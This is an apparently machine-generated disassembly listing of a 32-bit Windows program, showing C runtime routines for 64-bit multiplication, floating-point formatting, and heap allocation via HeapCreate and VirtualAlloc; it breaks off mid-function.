sub_411B40 proc near ; CODE XREF: sub_41095C+8DC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_411B59
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_411B59: ; CODE XREF: sub_411B40+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_411B40 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_411BA5
loc_411B74: ; CODE XREF: sub_411BA5:loc_411BAE�j
push 8
push offset stru_41BC70
call __SEH_prolog
and dword ptr [ebp-4], 0
push 0
push 1
call sub_41533C
pop ecx
pop ecx
jmp short loc_411B98
; END OF FUNCTION CHUNK FOR sub_411BA5
; =============== S U B R O U T I N E =======================================
sub_411B91 proc near ; DATA XREF: .text:stru_41BC70�o
xor eax, eax
inc eax
retn
sub_411B91 endp
; ---------------------------------------------------------------------------
loc_411B95: ; DATA XREF: .text:stru_41BC70�o
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_411BA5
loc_411B98: ; CODE XREF: sub_411BA5-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call dword_4190B8 ; ExitProcess
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_411BA5
; =============== S U B R O U T I N E =======================================
sub_411BA5 proc near ; CODE XREF: sub_40E1DE+AC�p
; sub_40FBCF+76E�p ...
; FUNCTION CHUNK AT 00411B74 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00411B98 SIZE 0000000D BYTES
cmp ecx, dword_421360
jnz short loc_411BAE
retn
; ---------------------------------------------------------------------------
loc_411BAE: ; CODE XREF: sub_411BA5+6�j
jmp loc_411B74
sub_411BA5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_411BB3 proc near ; CODE XREF: sub_40FBCF+459�p
; DATA XREF: sub_40E292+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_40EB9E
cmp eax, 65h
pop ecx
jz short loc_411BF1
loc_411BC7: ; CODE XREF: sub_411BB3+3C�j
inc esi
cmp dword_4214F4, 1
movsx eax, byte ptr [esi]
jle short loc_411BE0
push 4
push eax
call sub_41328D
pop ecx
pop ecx
jmp short loc_411BED
; ---------------------------------------------------------------------------
loc_411BE0: ; CODE XREF: sub_411BB3+1F�j
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
loc_411BED: ; CODE XREF: sub_411BB3+2B�j
test eax, eax
jnz short loc_411BC7
loc_411BF1: ; CODE XREF: sub_411BB3+12�j
mov al, [esi]
mov cl, byte_4214F8
mov [esi], cl
inc esi
loc_411BFC: ; CODE XREF: sub_411BB3+54�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_411BFC
pop esi
retn
sub_411BB3 endp
; =============== S U B R O U T I N E =======================================
sub_411C0B proc near ; CODE XREF: sub_40FBCF+46A�p
; DATA XREF: sub_40E292+A�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov bl, byte_4214F8
jmp short loc_411C1D
; ---------------------------------------------------------------------------
loc_411C18: ; CODE XREF: sub_411C0B+16�j
cmp cl, bl
jz short loc_411C23
inc eax
loc_411C1D: ; CODE XREF: sub_411C0B+B�j
mov cl, [eax]
test cl, cl
jnz short loc_411C18
loc_411C23: ; CODE XREF: sub_411C0B+F�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_411C54
jmp short loc_411C37
; ---------------------------------------------------------------------------
loc_411C2C: ; CODE XREF: sub_411C0B+30�j
cmp cl, 65h
jz short loc_411C3D
cmp cl, 45h
jz short loc_411C3D
inc eax
loc_411C37: ; CODE XREF: sub_411C0B+1F�j
mov cl, [eax]
test cl, cl
jnz short loc_411C2C
loc_411C3D: ; CODE XREF: sub_411C0B+24�j
; sub_411C0B+29�j
mov edx, eax
loc_411C3F: ; CODE XREF: sub_411C0B+38�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_411C3F
cmp [eax], bl
jnz short loc_411C4A
dec eax
loc_411C4A: ; CODE XREF: sub_411C0B+3C�j
; sub_411C0B+47�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_411C4A
loc_411C54: ; CODE XREF: sub_411C0B+1D�j
pop ebx
retn
sub_411C0B endp
; =============== S U B R O U T I N E =======================================
sub_411C56 proc near ; DATA XREF: sub_40E292+28�o
; .text:off_421374�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_41BC80
fnstsw ax
test ah, 1
jnz short loc_411C6D
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_411C6D: ; CODE XREF: sub_411C56+11�j
xor eax, eax
retn
sub_411C56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411C70 proc near ; CODE XREF: sub_41095C+495�p
; DATA XREF: sub_40E292+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_411C99
lea eax, [ebp+var_8]
push eax
call sub_4157AA
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_411C99: ; CODE XREF: sub_411C70+C�j
lea eax, [ebp+arg_0]
push eax
call sub_4157ED
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [eax], ecx
leave
retn
sub_411C70 endp
; =============== S U B R O U T I N E =======================================
sub_411CAE proc near ; CODE XREF: sub_411CCB+2F�p
; sub_411DBE+7E�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_411CC9
push esi
call sub_40D630
inc eax
push eax
push esi
add esi, edi
push esi
call sub_40F260
add esp, 10h
loc_411CC9: ; CODE XREF: sub_411CAE+5�j
pop esi
retn
sub_411CAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411CCB proc near ; CODE XREF: sub_411E9B+96�p
; sub_411F45+47�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp byte_4C5978, 0
push ebx
push esi
push edi
jz short loc_411D01
mov ebx, [ebp+arg_8]
mov eax, dword_4C5974
xor ecx, ecx
test ebx, ebx
setnle cl
xor edx, edx
cmp dword ptr [eax], 2Dh
mov esi, eax
setz dl
mov edi, ecx
add edx, [ebp+arg_4]
mov eax, edx
call sub_411CAE
jmp short loc_411D37
; ---------------------------------------------------------------------------
loc_411D01: ; CODE XREF: sub_411CCB+D�j
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_415961
mov ebx, [ebp+arg_8]
mov edx, [ebp+arg_4]
mov esi, eax
push esi
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_415830
add esp, 14h
loc_411D37: ; CODE XREF: sub_411CCB+34�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_411D43
mov byte ptr [eax], 2Dh
inc eax
loc_411D43: ; CODE XREF: sub_411CCB+72�j
test ebx, ebx
jle short loc_411D58
lea edi, [eax+1]
mov cl, [edi]
mov [eax], cl
mov cl, byte_4214F8
mov eax, edi
mov [eax], cl
loc_411D58: ; CODE XREF: sub_411CCB+7A�j
xor ecx, ecx
cmp byte_4C5978, cl
push offset dword_41BC88
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_40D8A0
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_411D7F
mov byte ptr [ecx], 45h
loc_411D7F: ; CODE XREF: sub_411CCB+AF�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_411DB6
mov eax, [esi+4]
dec eax
jns short loc_411D93
neg eax
mov byte ptr [ecx], 2Dh
loc_411D93: ; CODE XREF: sub_411CCB+C1�j
inc ecx
cmp eax, 64h
jl short loc_411DA3
cdq
push 64h
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_411DA3: ; CODE XREF: sub_411CCB+CC�j
inc ecx
cmp eax, 0Ah
jl short loc_411DB3
cdq
push 0Ah
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_411DB3: ; CODE XREF: sub_411CCB+DC�j
add [ecx+1], al
loc_411DB6: ; CODE XREF: sub_411CCB+BB�j
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_411CCB endp
; =============== S U B R O U T I N E =======================================
sub_411DBE proc near ; CODE XREF: sub_411E9B+7D�p
; sub_411F45+1E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp byte_4C5978, 0
push ebx
mov ebx, [esp+4+arg_4]
push ebp
push esi
push edi
jz short loc_411DF7
mov eax, dword_4C597C
cmp eax, [esp+10h+arg_8]
mov esi, dword_4C5974
jnz short loc_411E23
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebx
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_411E23
; ---------------------------------------------------------------------------
loc_411DF7: ; CODE XREF: sub_411DBE+F�j
mov eax, [esp+10h+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_415961
mov esi, eax
mov eax, [esi+4]
add eax, [esp+18h+arg_8]
push esi
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebx
push eax
call sub_415830
add esp, 14h
loc_411E23: ; CODE XREF: sub_411DBE+20�j
; sub_411DBE+37�j
cmp dword ptr [esi], 2Dh
mov ebp, ebx
jnz short loc_411E30
mov byte ptr [ebx], 2Dh
lea ebp, [ebx+1]
loc_411E30: ; CODE XREF: sub_411DBE+6A�j
mov eax, [esi+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_411E48
mov eax, ebp
call sub_411CAE
mov byte ptr [ebp+0], 30h
inc ebp
jmp short loc_411E4A
; ---------------------------------------------------------------------------
loc_411E48: ; CODE XREF: sub_411DBE+7A�j
add ebp, eax
loc_411E4A: ; CODE XREF: sub_411DBE+88�j
cmp [esp+10h+arg_8], 0
jle short loc_411E94
mov eax, ebp
call sub_411CAE
mov al, byte_4214F8
mov [ebp+0], al
mov esi, [esi+4]
inc ebp
test esi, esi
jge short loc_411E94
neg esi
cmp byte_4C5978, 0
jnz short loc_411E79
cmp [esp+10h+arg_8], esi
jl short loc_411E7D
loc_411E79: ; CODE XREF: sub_411DBE+B3�j
mov [esp+10h+arg_8], esi
loc_411E7D: ; CODE XREF: sub_411DBE+B9�j
mov edi, [esp+10h+arg_8]
mov eax, ebp
call sub_411CAE
push edi
push 30h
push ebp
call sub_40D7B0
add esp, 0Ch
loc_411E94: ; CODE XREF: sub_411DBE+91�j
; sub_411DBE+A8�j
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
retn
sub_411DBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411E9B proc near ; CODE XREF: sub_411F45+34�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push dword ptr [esi+4]
push dword ptr [esi]
call sub_415961
mov ecx, [eax+4]
mov ebx, [ebp+arg_8]
dec ecx
mov dword_4C597C, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
setz cl
push ebx
mov dword_4C5974, eax
add ecx, [ebp+arg_4]
mov edi, ecx
push edi
call sub_415830
mov eax, dword_4C5974
mov eax, [eax+4]
add esp, 14h
dec eax
cmp dword_4C597C, eax
mov dword_4C597C, eax
setl cl
cmp eax, 0FFFFFFFCh
mov byte_4C5980, cl
jl short loc_411F22
cmp eax, ebx
jge short loc_411F22
test cl, cl
jz short loc_411F0C
loc_411F02: ; CODE XREF: sub_411E9B+6C�j
mov al, [edi]
inc edi
test al, al
jnz short loc_411F02
and [edi-2], al
loc_411F0C: ; CODE XREF: sub_411E9B+65�j
push ebx
push [ebp+arg_4]
mov byte_4C5978, 1
push esi
call sub_411DBE
add esp, 0Ch
jmp short loc_411F39
; ---------------------------------------------------------------------------
loc_411F22: ; CODE XREF: sub_411E9B+5D�j
; sub_411E9B+61�j
push [ebp+arg_C]
mov byte_4C5978, 1
push ebx
push [ebp+arg_4]
push esi
call sub_411CCB
add esp, 10h
loc_411F39: ; CODE XREF: sub_411E9B+85�j
and byte_4C5978, 0
pop edi
pop esi
pop ebx
pop ebp
retn
sub_411E9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411F45 proc near ; CODE XREF: sub_40FBCF+43E�p
; DATA XREF: sub_40E292�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_411F80
cmp [ebp+arg_8], 45h
jz short loc_411F80
cmp [ebp+arg_8], 66h
jnz short loc_411F6D
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411DBE
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_411F6D: ; CODE XREF: sub_411F45+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411E9B
jmp short loc_411F91
; ---------------------------------------------------------------------------
loc_411F80: ; CODE XREF: sub_411F45+7�j
; sub_411F45+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411CCB
loc_411F91: ; CODE XREF: sub_411F45+39�j
add esp, 10h
pop ebp
retn
sub_411F45 endp
; =============== S U B R O U T I N E =======================================
sub_411F96 proc near ; CODE XREF: sub_40E2CA+F�p
push 30000h
push 10000h
call sub_415B36
pop ecx
pop ecx
retn
sub_411F96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411FA8 proc near ; CODE XREF: sub_411FE8:loc_41200C�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_41BCA0
fstp [ebp+var_8]
fld dbl_41BC98
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_41BC90
fnstsw ax
test ah, 41h
jnz short loc_411FE4
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_411FE4: ; CODE XREF: sub_411FA8+35�j
xor eax, eax
leave
retn
sub_411FA8 endp
; =============== S U B R O U T I N E =======================================
sub_411FE8 proc near ; CODE XREF: sub_40E2CA+5�p
push offset aKernel32 ; "KERNEL32"
call dword_419094 ; GetModuleHandleA
test eax, eax
jz short loc_41200C
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword_4190F8 ; GetProcAddress
test eax, eax
jz short loc_41200C
push 0
call eax ; sub_40E2CA
retn
; ---------------------------------------------------------------------------
loc_41200C: ; CODE XREF: sub_411FE8+D�j
; sub_411FE8+1D�j
jmp sub_411FA8
sub_411FE8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412011 proc near ; CODE XREF: sub_41202B+20�p
cmp dword_4C5910, 2
jnz short loc_412027
cmp dword_4C591C, 5
jb short loc_412027
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_412027: ; CODE XREF: sub_412011+7�j
; sub_412011+10�j
push 3
pop eax
retn
sub_412011 endp
; =============== S U B R O U T I N E =======================================
sub_41202B proc near ; CODE XREF: .text:0040F91A�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call dword_41919C ; HeapCreate
test eax, eax
mov dword_4C5B64, eax
jz short loc_412075
call sub_412011
cmp eax, 3
mov dword_4C5B68, eax
jnz short loc_412078
push 3F8h
call sub_41207C
test eax, eax
pop ecx
jnz short loc_412078
push dword_4C5B64
call dword_4191A0 ; HeapDestroy
loc_412075: ; CODE XREF: sub_41202B+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_412078: ; CODE XREF: sub_41202B+2D�j
; sub_41202B+3C�j
xor eax, eax
inc eax
retn
sub_41202B endp
; =============== S U B R O U T I N E =======================================
sub_41207C proc near ; CODE XREF: sub_41202B+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_4C5B64
call dword_4191B8 ; RtlAllocateHeap
test eax, eax
mov dword_4C5B50, eax
jnz short loc_412099
retn
; ---------------------------------------------------------------------------
loc_412099: ; CODE XREF: sub_41207C+1A�j
mov ecx, [esp+arg_0]
and dword_4C5B48, 0
and dword_4C5B4C, 0
mov dword_4C5B58, eax
xor eax, eax
mov dword_4C5B54, ecx
mov dword_4C5B5C, 10h
inc eax
retn
sub_41207C endp
; =============== S U B R O U T I N E =======================================
sub_4120C4 proc near ; CODE XREF: sub_40E359+13�p
; sub_414F92+48�p ...
arg_0 = dword ptr 4
mov eax, dword_4C5B4C
lea ecx, [eax+eax*4]
mov eax, dword_4C5B50
lea ecx, [eax+ecx*4]
jmp short loc_4120E8
; ---------------------------------------------------------------------------
loc_4120D6: ; CODE XREF: sub_4120C4+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_4120EE
add eax, 14h
loc_4120E8: ; CODE XREF: sub_4120C4+10�j
cmp eax, ecx
jb short loc_4120D6
xor eax, eax
locret_4120EE: ; CODE XREF: sub_4120C4+1F�j
retn
sub_4120C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4120EF proc near ; CODE XREF: sub_40E359+1F�p
; sub_414F92+9C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_412403
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_4121BA
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_412152
push 3Fh
pop edx
loc_412152: ; CODE XREF: sub_4120EF+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41219C
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_41217D
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_412199
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_412199
; ---------------------------------------------------------------------------
loc_41217D: ; CODE XREF: sub_4120EF+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_412199
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_412199: ; CODE XREF: sub_4120EF+85�j
; sub_4120EF+8C�j ...
mov ebx, [ebp+arg_4]
loc_41219C: ; CODE XREF: sub_4120EF+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_4121BA: ; CODE XREF: sub_4120EF+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_4121C8
push 3Fh
pop edx
loc_4121C8: ; CODE XREF: sub_4120EF+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_412266
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_4121ED
mov ebx, esi
loc_4121ED: ; CODE XREF: sub_4120EF+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_4121FF
mov edx, esi
loc_4121FF: ; CODE XREF: sub_4120EF+10C�j
cmp ebx, edx
jz short loc_412261
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_412249
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_41222F
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_412249
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_412249
; ---------------------------------------------------------------------------
loc_41222F: ; CODE XREF: sub_4120EF+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_412249
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_412249: ; CODE XREF: sub_4120EF+11D�j
; sub_4120EF+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_412261: ; CODE XREF: sub_4120EF+112�j
mov esi, [ebp+arg_4]
jmp short loc_412269
; ---------------------------------------------------------------------------
loc_412266: ; CODE XREF: sub_4120EF+E2�j
mov ebx, [ebp+arg_0]
loc_412269: ; CODE XREF: sub_4120EF+175�j
cmp [ebp+var_C], 0
jnz short loc_412277
cmp ebx, edx
jz loc_4122F7
loc_412277: ; CODE XREF: sub_4120EF+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_4122F7
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_4122CE
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4122BD
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_4122BD: ; CODE XREF: sub_4120EF+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_4122F7
; ---------------------------------------------------------------------------
loc_4122CE: ; CODE XREF: sub_4120EF+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4122E4
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4122E4: ; CODE XREF: sub_4120EF+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_4122F7: ; CODE XREF: sub_4120EF+182�j
; sub_4120EF+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_412402
mov eax, dword_4C5B48
test eax, eax
jz loc_4123F4
mov ecx, dword_4C5B60
mov esi, dword_419178
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_4C5B60
mov eax, dword_4C5B48
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_4C5B48
mov eax, [eax+10h]
mov ecx, dword_4C5B60
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_4C5B48
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_4C5B48
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_412385
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_4C5B48
loc_412385: ; CODE XREF: sub_4120EF+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4123F4
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_4C5B48
push dword ptr [eax+10h]
push 0
push dword_4C5B64
call dword_4191B4 ; RtlFreeHeap
mov eax, dword_4C5B4C
mov edx, dword_4C5B50
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_4C5B48
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_40F260
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_4C5B4C
cmp eax, dword_4C5B48
jbe short loc_4123EA
sub [ebp+arg_0], 14h
loc_4123EA: ; CODE XREF: sub_4120EF+2F5�j
mov eax, dword_4C5B50
mov dword_4C5B58, eax
loc_4123F4: ; CODE XREF: sub_4120EF+223�j
; sub_4120EF+29A�j
mov eax, [ebp+arg_0]
mov dword_4C5B48, eax
mov dword_4C5B60, edi
loc_412402: ; CODE XREF: sub_4120EF+216�j
pop ebx
loc_412403: ; CODE XREF: sub_4120EF+37�j
pop edi
pop esi
leave
retn
sub_4120EF endp
; =============== S U B R O U T I N E =======================================
sub_412407 proc near ; CODE XREF: sub_4128A3+150�p
mov eax, dword_4C5B4C
mov ecx, dword_4C5B5C
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41244D
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_4C5B50
push edi
push dword_4C5B64
call dword_419170 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_41243C
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_41243C: ; CODE XREF: sub_412407+2F�j
add dword_4C5B5C, 10h
mov dword_4C5B50, eax
mov eax, dword_4C5B4C
loc_41244D: ; CODE XREF: sub_412407+10�j
mov ecx, dword_4C5B50
push esi
push 41C4h
push 8
push dword_4C5B64
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call dword_4191B8 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_412478
loc_412474: ; CODE XREF: sub_412407+9B�j
xor eax, eax
jmp short loc_4124BB
; ---------------------------------------------------------------------------
loc_412478: ; CODE XREF: sub_412407+6B�j
push 4
push 2000h
push 100000h
push edi
call dword_419174 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_4124A4
push dword ptr [esi+10h]
push edi
push dword_4C5B64
call dword_4191B4 ; RtlFreeHeap
jmp short loc_412474
; ---------------------------------------------------------------------------
loc_4124A4: ; CODE XREF: sub_412407+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_4C5B4C
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_4124BB: ; CODE XREF: sub_412407+6F�j
pop esi
pop edi
retn
sub_412407 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124BE proc near ; CODE XREF: sub_4128A3+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_4124D6
; ---------------------------------------------------------------------------
loc_4124D3: ; CODE XREF: sub_4124BE+1A�j
shl eax, 1
inc ebx
loc_4124D6: ; CODE XREF: sub_4124BE+13�j
test eax, eax
jge short loc_4124D3
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_4124EF: ; CODE XREF: sub_4124BE+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4124EF
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call dword_419174 ; VirtualAlloc
test eax, eax
jnz short loc_412522
or eax, 0FFFFFFFFh
jmp loc_4125BF
; ---------------------------------------------------------------------------
loc_412522: ; CODE XREF: sub_4124BE+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_412572
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
